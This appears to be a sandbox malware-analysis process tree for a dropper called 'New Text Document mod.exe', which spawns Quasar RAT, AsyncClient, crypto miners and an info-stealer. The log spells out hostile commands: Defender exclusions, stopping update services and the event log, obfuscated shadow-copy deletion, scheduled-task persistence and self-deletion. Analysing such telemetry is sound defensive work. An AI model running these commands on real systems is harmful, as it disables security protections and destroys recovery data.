C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3548
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
PID:3616 -
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe.zip"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:756
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵
- Quasar RAT
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1428 -
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1832 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3124
-
-
C:\Users\Admin\Desktop\a\voidware_loader.exe"C:\Users\Admin\Desktop\a\voidware_loader.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2136 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "DirectX" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:1144
-
-
C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe"C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4332 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "DirectX" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:3936
-
-
-
-
C:\Users\Admin\Desktop\a\build.exe"C:\Users\Admin\Desktop\a\build.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3324
-
-
C:\Users\Admin\Desktop\a\gem2.exe"C:\Users\Admin\Desktop\a\gem2.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:5572 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1316
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart5⤵PID:5080
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart6⤵PID:5372
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc5⤵
- Launches sc.exe
PID:4672
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc5⤵
- Launches sc.exe
PID:5304
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv5⤵
- Launches sc.exe
PID:5324
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits5⤵
- Launches sc.exe
PID:3036
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc5⤵
- Launches sc.exe
PID:5396
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 05⤵
- Power Settings
PID:5612
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 05⤵
- Power Settings
PID:5620
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 05⤵
- Power Settings
PID:5624
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 05⤵
- Power Settings
PID:5680
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe5⤵
- Suspicious behavior: EnumeratesProcesses
PID:5692
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GeekBrains"5⤵
- Launches sc.exe
PID:3560
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto"5⤵
- Launches sc.exe
PID:3876 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5504
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog5⤵
- Launches sc.exe
PID:1324 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5948
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GeekBrains"5⤵
- Launches sc.exe
PID:2824 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5956
-
-
-
-
C:\Users\Admin\Desktop\a\gem1.exe"C:\Users\Admin\Desktop\a\gem1.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3808 -
C:\Users\Admin\Desktop\a\gem1.exe"C:\Users\Admin\Desktop\a\gem1.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:3240
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3808 -s 1405⤵
- Program crash
PID:5148
-
-
-
C:\Users\Admin\Desktop\a\123.exe"C:\Users\Admin\Desktop\a\123.exe"4⤵PID:3528
-
-
C:\Users\Admin\Desktop\a\xmrig.exe"C:\Users\Admin\Desktop\a\xmrig.exe"4⤵PID:7180
-
-
C:\Users\Admin\Desktop\a\RuntimeBroker.exe"C:\Users\Admin\Desktop\a\RuntimeBroker.exe"4⤵PID:7704
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\a7\RuntimeBroker.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:7796
-
-
C:\Windows\system32\a7\RuntimeBroker.exe"C:\Windows\system32\a7\RuntimeBroker.exe"5⤵PID:7956
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\a7\RuntimeBroker.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:8120
-
-
-
-
C:\Users\Admin\Desktop\a\Crawl.exe"C:\Users\Admin\Desktop\a\Crawl.exe"4⤵PID:7540
-
\??\c:\Windows\system32\wbem\wmic.exec:\JHdIVt\JHdI\..\..\Windows\JHdI\JHdI\..\..\system32\JHdI\JHdI\..\..\wbem\JHdI\JHdIV\..\..\wmic.exe shadowcopy delete5⤵PID:1180
-
-
\??\c:\Windows\system32\wbem\wmic.exec:\xwJKuU\xwJK\..\..\Windows\xwJK\xwJK\..\..\system32\xwJK\xwJK\..\..\wbem\xwJK\xwJKu\..\..\wmic.exe shadowcopy delete5⤵PID:2724
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\Desktop\a\Crawl.exe"5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:8504 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30006⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6988 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6988 -s 3447⤵
- Program crash
PID:4900
-
-
-
-
-
-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1668
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:468 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ffc6440cc40,0x7ffc6440cc4c,0x7ffc6440cc583⤵PID:3556
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1936,i,15595966034426380271,3123824761465129811,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=1932 /prefetch:23⤵PID:1212
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2164,i,15595966034426380271,3123824761465129811,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=2224 /prefetch:33⤵PID:4400
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2260,i,15595966034426380271,3123824761465129811,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=2468 /prefetch:83⤵PID:4664
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3148,i,15595966034426380271,3123824761465129811,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=3192 /prefetch:13⤵PID:4000
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3156,i,15595966034426380271,3123824761465129811,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=3220 /prefetch:13⤵PID:4420
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4520,i,15595966034426380271,3123824761465129811,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=4556 /prefetch:13⤵PID:4344
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4836,i,15595966034426380271,3123824761465129811,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=4888 /prefetch:83⤵PID:652
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4684,i,15595966034426380271,3123824761465129811,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=4928 /prefetch:83⤵PID:4824
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --reenable-autoupdates --system-level3⤵
- Drops file in Windows directory
PID:3108 -
C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x7ff69a2f4698,0x7ff69a2f46a4,0x7ff69a2f46b04⤵
- Drops file in Windows directory
PID:4836
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4680,i,15595966034426380271,3123824761465129811,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=4572 /prefetch:13⤵PID:4980
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵PID:2720
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4652 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1972 -parentBuildID 20240401114208 -prefsHandle 1888 -prefMapHandle 1880 -prefsLen 27137 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c99d922c-5506-455b-8378-b805270f4ce8} 4652 "\\.\pipe\gecko-crash-server-pipe.4652" gpu4⤵PID:1172
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2380 -parentBuildID 20240401114208 -prefsHandle 2356 -prefMapHandle 2352 -prefsLen 27015 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6b4ec2e5-dd69-4810-98e1-fe96d768e6d7} 4652 "\\.\pipe\gecko-crash-server-pipe.4652" socket4⤵PID:3216
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2992 -childID 1 -isForBrowser -prefsHandle 2996 -prefMapHandle 2984 -prefsLen 22698 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c3dff183-244b-454f-be2d-9815d0d9dcdd} 4652 "\\.\pipe\gecko-crash-server-pipe.4652" tab4⤵PID:1936
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3916 -childID 2 -isForBrowser -prefsHandle 3988 -prefMapHandle 3984 -prefsLen 32389 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {85c68065-e520-4a3e-a7d5-e171f090fb28} 4652 "\\.\pipe\gecko-crash-server-pipe.4652" tab4⤵PID:1804
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4764 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4768 -prefMapHandle 4756 -prefsLen 32389 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {59269b1b-ee45-47b3-a0e2-1dd946eb5bea} 4652 "\\.\pipe\gecko-crash-server-pipe.4652" utility4⤵
- Checks processor information in registry
PID:5140
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5380 -childID 3 -isForBrowser -prefsHandle 5372 -prefMapHandle 5360 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {485092b5-67bf-42ae-be1e-592ee83e32b3} 4652 "\\.\pipe\gecko-crash-server-pipe.4652" tab4⤵PID:5856
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5344 -childID 4 -isForBrowser -prefsHandle 5536 -prefMapHandle 5544 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b9791e95-0aab-4bf4-b8d5-d1895ac0e072} 4652 "\\.\pipe\gecko-crash-server-pipe.4652" tab4⤵PID:5868
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5744 -childID 5 -isForBrowser -prefsHandle 5664 -prefMapHandle 5668 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {39a2f2f7-f40f-4380-8816-f0a66759211b} 4652 "\\.\pipe\gecko-crash-server-pipe.4652" tab4⤵PID:5884
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6236 -childID 6 -isForBrowser -prefsHandle 6240 -prefMapHandle 6232 -prefsLen 27176 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {392af652-7570-4243-b0fb-bb81b0dc8cfc} 4652 "\\.\pipe\gecko-crash-server-pipe.4652" tab4⤵PID:1468
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5104 -childID 7 -isForBrowser -prefsHandle 6632 -prefMapHandle 6636 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9a5e0ff6-4efc-4be0-ae3b-982f6ba85391} 4652 "\\.\pipe\gecko-crash-server-pipe.4652" tab4⤵PID:5812
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4148 -parentBuildID 20240401114208 -prefsHandle 4276 -prefMapHandle 4272 -prefsLen 32419 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {10939f37-71a4-439a-9075-6d1178f7a842} 4652 "\\.\pipe\gecko-crash-server-pipe.4652" rdd4⤵PID:6000
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4284 -parentBuildID 20240401114208 -sandboxingKind 1 -prefsHandle 3664 -prefMapHandle 3660 -prefsLen 32419 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dbd10c5f-0c83-4bf4-8859-b212d50e011e} 4652 "\\.\pipe\gecko-crash-server-pipe.4652" utility4⤵
- Checks processor information in registry
PID:6092
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:6048 -
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:388 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4252
-
-
C:\Users\Admin\Desktop\a\albt.exe"C:\Users\Admin\Desktop\a\albt.exe"6⤵PID:8008
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8008 -s 7287⤵
- Program crash
PID:9140
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8008 -s 4767⤵
- Program crash
PID:9084
-
-
-
C:\Users\Admin\Desktop\a\drop1.exe"C:\Users\Admin\Desktop\a\drop1.exe"6⤵PID:8408
-
C:\Users\Admin\Desktop\a\drop1.exe"C:\Users\Admin\Desktop\a\drop1.exe"7⤵PID:9080
-
-
-
C:\Users\Admin\Desktop\a\sdggwsdgdrwgrwgrwgrwgrw.exe"C:\Users\Admin\Desktop\a\sdggwsdgdrwgrwgrwgrwgrw.exe"6⤵PID:7720
-
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"4⤵PID:4860
-
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"5⤵PID:2468
-
C:\Users\Admin\Desktop\a\64.exe"C:\Users\Admin\Desktop\a\64.exe"6⤵PID:5464
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c color 0a7⤵PID:280
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c chcp 9367⤵PID:3404
-
C:\Windows\system32\chcp.comchcp 9368⤵PID:568
-
-
-
-
-
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵PID:6980
-
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵PID:7028
-
C:\Users\Admin\Desktop\a\svhost.exe"C:\Users\Admin\Desktop\a\svhost.exe"4⤵PID:2392
-
-
C:\Users\Admin\Desktop\a\chrtrome22.exe"C:\Users\Admin\Desktop\a\chrtrome22.exe"4⤵PID:6916
-
C:\xmrig\xmrig-6.22.2\xmrig.exe"C:\xmrig\xmrig-6.22.2\xmrig.exe" --config=C:\xmrig\xmrig-6.22.2\config.json5⤵PID:5160
-
-
-
C:\Users\Admin\Desktop\a\Fixer.exe"C:\Users\Admin\Desktop\a\Fixer.exe"4⤵PID:960
-
-
C:\Users\Admin\Desktop\a\Steanings.exe"C:\Users\Admin\Desktop\a\Steanings.exe"4⤵PID:7300
-
-
C:\Users\Admin\Desktop\a\AsyncClientGK.exe"C:\Users\Admin\Desktop\a\AsyncClientGK.exe"4⤵PID:7480
-
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵PID:4132
-
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵PID:5628
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵PID:5308
-
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵PID:1504
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵PID:1196
-
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵PID:6420
-
C:\Users\Admin\Desktop\a\uu.exe"C:\Users\Admin\Desktop\a\uu.exe"4⤵PID:8076
-
-
C:\Users\Admin\Desktop\a\Crawl.exe"C:\Users\Admin\Desktop\a\Crawl.exe"4⤵PID:7264
-
\??\c:\Windows\system32\wbem\wmic.exec:\ZtgEnu\ZtgE\..\..\Windows\ZtgE\ZtgE\..\..\system32\ZtgE\ZtgE\..\..\wbem\ZtgE\ZtgEn\..\..\wmic.exe shadowcopy delete5⤵PID:8204
-
-
\??\c:\Windows\system32\wbem\wmic.exec:\uJhWbv\uJhW\..\..\Windows\uJhW\uJhW\..\..\system32\uJhW\uJhW\..\..\wbem\uJhW\uJhWb\..\..\wmic.exe shadowcopy delete5⤵PID:9176
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\Desktop\a\Crawl.exe"5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4932 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30006⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2516
-
-
-
-
C:\Users\Admin\Desktop\a\sela.exe"C:\Users\Admin\Desktop\a\sela.exe"4⤵PID:7968
-
-
C:\Users\Admin\Desktop\a\JJSPLOIT.V2.exe"C:\Users\Admin\Desktop\a\JJSPLOIT.V2.exe"4⤵PID:8056
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:6568
-
-
C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe"C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe"5⤵PID:7952
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:9188
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rwsY5aFhRhew.bat" "6⤵PID:1616
-
C:\Windows\system32\chcp.comchcp 650017⤵PID:7316
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost7⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5600
-
-
C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe"C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe"7⤵PID:8600
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f8⤵
- Scheduled Task/Job: Scheduled Task
PID:7588
-
-
-
-
-
-
C:\Users\Admin\Desktop\a\drop2.exe"C:\Users\Admin\Desktop\a\drop2.exe"4⤵PID:5684
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'"5⤵
- Command and Scripting Interpreter: PowerShell
PID:6868
-
-
C:\Windows\SYSTEM32\SCHTASKS.exeSCHTASKS /CREATE /TN "System-f4855f59e0" /TR "C:\Windows\System32\System-f4855f59e0.exe" /SC ONLOGON /RL HIGHEST /F5⤵
- Scheduled Task/Job: Scheduled Task
PID:3184
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe5⤵PID:8276
-
C:\Windows\System32\powercfg.exepowercfg -change standby-timeout-ac 06⤵
- Power Settings
PID:7864
-
-
C:\Windows\System32\powercfg.exepowercfg -change monitor-timeout-ac 06⤵
- Power Settings
PID:7868
-
-
C:\Windows\System32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BUTTONS LIDACTION 06⤵
- Power Settings
PID:7764
-
-
C:\Windows\System32\powercfg.exepowercfg /setactive SCHEME_CURRENT6⤵
- Power Settings
PID:7700
-
-
C:\Windows\System32\Wbem\wmic.exewmic diskdrive get serialnumber6⤵PID:7516
-
-
C:\Windows\System32\Wbem\wmic.exewmic diskdrive get serialnumber6⤵PID:3376
-
-
C:\Windows\System32\curl.execurl -s https://api.ipify.org6⤵PID:5436
-
-
C:\Windows\System32\Wbem\wmic.exewmic diskdrive get serialnumber6⤵PID:2504
-
-
C:\Windows\System32\curl.execurl -s http://ipinfo.io/country6⤵PID:1172
-
-
